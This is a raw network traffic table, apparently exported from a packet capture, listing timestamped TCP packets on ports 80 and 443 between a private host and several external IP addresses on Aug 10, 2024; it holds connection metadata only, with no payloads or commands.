Aug 10, 2024 16:12:22.566309929 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.566956043 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.566968918 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.566982985 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.567003012 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.567017078 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.567651033 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.567666054 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.567678928 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.567701101 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.567714930 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.568547964 CEST	80	49742	194.58.114.223	192.168.2.4
Aug 10, 2024 16:12:22.568563938 CEST	80	49742	194.58.114.223	192.168.2.4
Aug 10, 2024 16:12:22.568576097 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.568594933 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.568619013 CEST	49742	80	192.168.2.4	194.58.114.223
Aug 10, 2024 16:12:22.568635941 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.569442034 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.569478989 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.569489002 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.569504023 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.569518089 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.569534063 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.569581032 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.569581032 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.569653034 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.569901943 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:22.569917917 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:22.570580959 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.570594072 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.570606947 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.570627928 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.570656061 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.571382046 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.571396112 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.571408987 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.571424961 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.571438074 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.572346926 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.572362900 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.572376013 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.572382927 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.572396040 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.572400093 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.572411060 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.572422981 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.573185921 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.573199987 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.573215008 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.573231936 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.573246002 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.574139118 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.574152946 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.574170113 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.574188948 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.574204922 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.575249910 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.575264931 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.575278997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.575294018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.575298071 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.575320005 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.575365067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.575365067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.576112986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.576127052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.576139927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.576153994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.576165915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.576188087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.577045918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.577060938 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.577074051 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.577092886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.577133894 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.577811956 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.577826023 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.577838898 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.577857018 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.577888012 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.578541994 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.578556061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.578567982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.578583002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.578596115 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.578641891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.579385042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.579399109 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.579411983 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.579442978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.579473972 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.579473972 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.580225945 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.580240011 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.580252886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.580279112 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.580296993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.581077099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.581093073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.581104040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.581116915 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.581130028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.581161022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.581170082 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.582004070 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.582021952 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.582035065 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.582055092 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.582075119 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.582954884 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.582968950 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.582982063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.582999945 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.583033085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.583631039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.583643913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.583657980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.583669901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.583678961 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.583687067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.583719969 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.584506035 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.584520102 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.584533930 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.584563017 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.584578037 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.585346937 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.585361958 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.585375071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.585393906 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.585407972 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.585570097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.586196899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.586210966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.586225033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.586237907 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.586246014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.586256981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.586285114 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.587049007 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.587063074 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.587074995 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.587095022 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.587110043 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.587899923 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.587914944 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.587929010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.588387012 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.588565111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.588579893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.588592052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.588603020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.588608027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.588620901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.588629961 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.588639975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.588653088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.588675022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.589471102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.589483976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.589498043 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.589512110 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.589519978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.589541912 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.589572906 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.589572906 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.590357065 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.590370893 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.590384960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.590399981 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.590403080 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.590411901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.590434074 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.590451956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.591224909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.591238976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.591264963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.591273069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.591286898 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.591296911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.591334105 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.592276096 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.592289925 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.592303038 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.592315912 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.592328072 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.592339993 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.592370033 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.593297958 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.593313932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.593327045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.593328953 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.593342066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.593355894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.593359947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.593384981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.593385935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.593395948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.594680071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.594695091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.594733953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.594748020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.594752073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.594752073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.594775915 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.594794035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.595284939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595299959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595313072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595329046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595341921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595347881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.595366955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.595377922 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.595808029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595824003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595837116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595850945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.595854998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.596029043 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.596735001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.596749067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.596762896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.596776009 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.596790075 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.596795082 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.596860886 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.596862078 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.596885920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.597544909 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.597560883 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.597573996 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.597589016 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.597599983 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.597620964 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.598608971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.598623991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.598637104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.598651886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.598664045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.598668098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.598668098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.598679066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.598692894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.598712921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.598733902 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.599580050 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.599594116 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.599607944 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.599621058 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.599630117 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.599634886 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.599649906 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.599678040 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.600547075 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.600562096 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.600575924 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.600589991 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.600594997 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.600603104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.600609064 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.600617886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.600652933 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.600677013 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.600677013 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.601495028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.601509094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.601526022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.601540089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.601552963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.601578951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.601578951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.601648092 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.602447033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.602462053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.602477074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.602489948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.602504015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.602518082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.602525949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.602525949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.602643013 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.603334904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.603349924 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.603363037 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.603377104 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.603390932 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.603395939 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.603399992 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.603406906 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.603426933 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.603447914 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.604218960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.604233980 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.604248047 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.604263067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.604265928 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.604278088 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.604278088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.604320049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.605091095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.605108976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.605122089 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.605139971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.605158091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.605165005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.605179071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.605187893 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.605192900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.605211020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.605235100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.605266094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.605973005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.605988026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606000900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606014967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606028080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606034040 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.606034040 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.606057882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.606849909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606863976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606877089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606894970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.606899977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606914043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606926918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.606935978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.606965065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.606965065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.607681990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.607697010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.607709885 CEST	80	49740	147.45.44.104	192.168.2.4
